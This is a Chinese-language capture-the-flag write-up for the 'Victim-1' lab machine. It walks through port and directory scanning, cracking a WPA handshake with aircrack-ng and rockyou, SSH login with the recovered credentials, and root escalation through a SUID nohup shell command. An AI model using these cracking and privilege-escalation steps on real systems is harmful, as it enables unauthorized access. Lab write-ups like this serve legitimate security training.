Victim-1
Victim: 1
easyNo.8
目标: Get the root flag.
提示: Enumeration is key and bruteforcing SSH will get you banned.
妙妙工具:
python -c 'import pty; pty.spawn("/bin/bash")'
¶环境配置
- kali: 192.168.56.5
- target: 192.168.56.20
¶信息收集
nmap
nmap -sS 192.168.56.0/24 |
可以访问的界面由80和9000, 进行目录扫描, 扫了一大堆也没几个有用的
dirsearch -u http://192.168.56.20 --exclude-status 403,301 |
阅读htaccess.txt
和README.txt
, 得到这是一个Joomla CMS
/robots.txt.dist
里面的路由更是全军覆没, /robots.txt
可以得到
User-agent: * |
这个看起来是给我们看的, 那肯定是哪里有问题, 我们漏了什么; 重新扫描端口, 果然, 漏了一个8999端口
nmap -p 0-65535 192.168.56.20 |
访问8999端口, 发现是一个wordpress网站, 但是没有实际界面, 只能查看源码; 唯一只有WPA-01.cap
比较可疑
该流量包协议为802.11(WLAN)
DLine代表的是D-Link公司生产的设备, 一搜就知道是WiFi/路由器; 5a:b6:62则是MAC地址的一部分
所以这个流量文件是路由器交互的包, 肯定能拿到连接到路由器的密码
aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap |
第一个数据包存在双方信息, 剩下的都是通讯信息; 我们现在获取的有效字符串只有刚才的密码, 肯定是不够的, 看看第一个数据包中还有什么
每个无线网络都有自己的 SSID, 意思是SSID是唯一的, 这个可能会用于用户名;
注意直接爆破ssh会被封禁, 所以要尽可能地缩小范围
现在, 可以能利用到的服务都使用过了, 尝试利用已有信息登录ssh
dlink : p4ssword |
¶getshell
ssh dlink@192.168.56.20 |
成功登录
¶信息收集
# 系统信息 Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux |
sudo -l
中首先那个文件不存在, 然后我们没有权限创建那个文件; 内核版本太高, payload不好找; 还是来看看有SUID权限的nohup提权吧
¶提权
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" |
成功提权并拿到在root下的flag